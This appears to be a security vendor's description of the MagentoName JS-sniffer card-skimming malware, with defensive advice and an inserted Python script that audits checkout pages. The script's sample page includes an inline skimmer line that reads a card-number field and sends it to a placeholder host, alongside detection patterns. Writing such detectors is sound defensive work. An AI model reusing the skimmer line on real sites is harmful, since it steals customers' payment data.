
MagentoName JS-sniffer

Posted: April 6, 2019

The MagentoName JS-sniffer is a family of Trojan sniffers that intercept customers' transaction credentials by compromising a website's code. Server administrators can use traditional security practices to keep their sites safe from these attacks and should notify customers immediately of any breaches. Anti-malware tools are available for analyzing your website and removing a MagentoName JS-sniffer variant and other sniffers.

The Danger of a Little JavaScript with Your Shopping Cart

While often overlooked, the sniffer Trojan is finding financial success in the underground as an alternative to conventional spyware. Instead of compromising individual users' systems, these Trojans are injected into widely-trafficked websites, allowing the collection of information from anyone making purchases through them. The MagentoName JS-sniffer is one of the most prominent and financially successful families of sniffer Trojans and is the Web equivalent of a POS (point-of-sale) skimmer from the 'real world.'

The MagentoName JS-sniffer takes its name from its exploitation of the Magento e-commerce software, which is in use by hundreds of thousands of websites, including brands like Ford and Nike. Remote attackers hack sites that still run out-of-date software with unpatched vulnerabilities and insert the JavaScript code for their version of the MagentoName JS-sniffer. JavaScript is a frequently recurring security risk that malware researchers regularly connect with other attacks, including those of EKs like the RIG Exploit Kit.

The MagentoName JS-sniffer loads its scripts whenever users make a purchase and may remain dormant the rest of the time to avoid detection. Besides passively collecting purchasing data, such as credit card numbers, the MagentoName JS-sniffer may prompt users to provide more information while pretending that the request is from the website. Although there is some possibility of a threat actor deploying the Trojan's script sloppily and giving away symptoms, in most Trojan sniffers' attacks, any evidence of this threatening activity is insignificant or not present.

Sniffing a Trojan's Telltale Scent

Although Web surfers should always watch for discrepancies in any financial transactions, a MagentoName JS-sniffer attack isn't necessarily visible. Disabling JavaScript and other exploitable browser features can reduce the chances of an attack's occurrence, and most anti-malware products include various forms of Web-browsing protection that could identify any sniffing activity. Users should also monitor their financial records semi-regularly to spot any unusual charges or other changes that require notifying their bank or card company.

Websites should be hardened against MagentoName JS-sniffer injections by traditional methods. These defensive options include staying abreast of security updates for software like the Magento CMS, using multiple layers of protection, being careful about whitelisting IP addresses indiscriminately, avoiding 'easy' passwords, and adding any of several authentication methods to your firewall configuration. Anti-malware services for scanning your site and removing the MagentoName JS-sniffer can provide after-the-fact protection, as well.
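One way a site owner could audit a checkout page for the injected-script pattern described above, as an added example that is not part of the original article or of any vendor's tool. The function name, the field and send heuristics, and every host name in the sample page are assumptions constructed for illustration; they are not signatures of this family.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Generic heuristics chosen for this example (assumptions, not family signatures).
FIELD_HINTS = re.compile(r"cc_number|card_number|cc_cid|cvv|expir", re.I)
SEND_HINTS = re.compile(r"XMLHttpRequest|fetch\s*\(|sendBeacon|new\s+Image|\.src\s*=", re.I)

# Constructed sample checkout page; every host name is a placeholder.
SAMPLE = """<html><body>
<script src="/js/checkout.js"></script>
<script src="https://js.payments.example/v1.js"></script>
<script src="https://static-cdn.example.net/lib.min.js"></script>
<script>var n=document.querySelector('[name=cc_number]').value;new Image().src='https://collect.example.org/?d='+n;</script>
</body></html>"""


class ScriptCollector(HTMLParser):
    """Collect [src, inline_body] for every <script> element."""

    def __init__(self):
        super().__init__()
        self.scripts, self._open = [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._open = True
            self.scripts.append([dict(attrs).get("src"), ""])

    def handle_endtag(self, tag):
        self._open = self._open and tag != "script"

    def handle_data(self, data):
        if self._open:
            self.scripts[-1][1] += data


def audit_checkout_scripts(html, page_host, allowed_hosts):
    """Return (reason, detail) findings for scripts that need review."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src, body in collector.scripts:
        if src:  # external: relative URLs resolve to the page's own host
            host = urlparse(src).hostname or page_host
            if host != page_host and host not in allowed_hosts:
                findings.append(("unapproved-external-script", src))
        elif FIELD_HINTS.search(body) and SEND_HINTS.search(body):
            findings.append(("inline-reads-card-fields-and-sends", body.strip()[:60]))
    return findings
```

Calling `audit_checkout_scripts(SAMPLE, "shop.example", {"js.payments.example"})` flags the unlisted third-party script and the inline script that both reads a card field and sends data out. Obfuscated or dynamically loaded scripts can evade keyword heuristics like these, so the host allowlist is the stronger of the two checks.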

There once was a time when a sniffer Trojan was beneath the notice of the anti-malware industry's in-depth analytical efforts. The profits of threats like the MagentoName JS-sniffer family, however, beg to differ, and website vendors are playing catch-up.
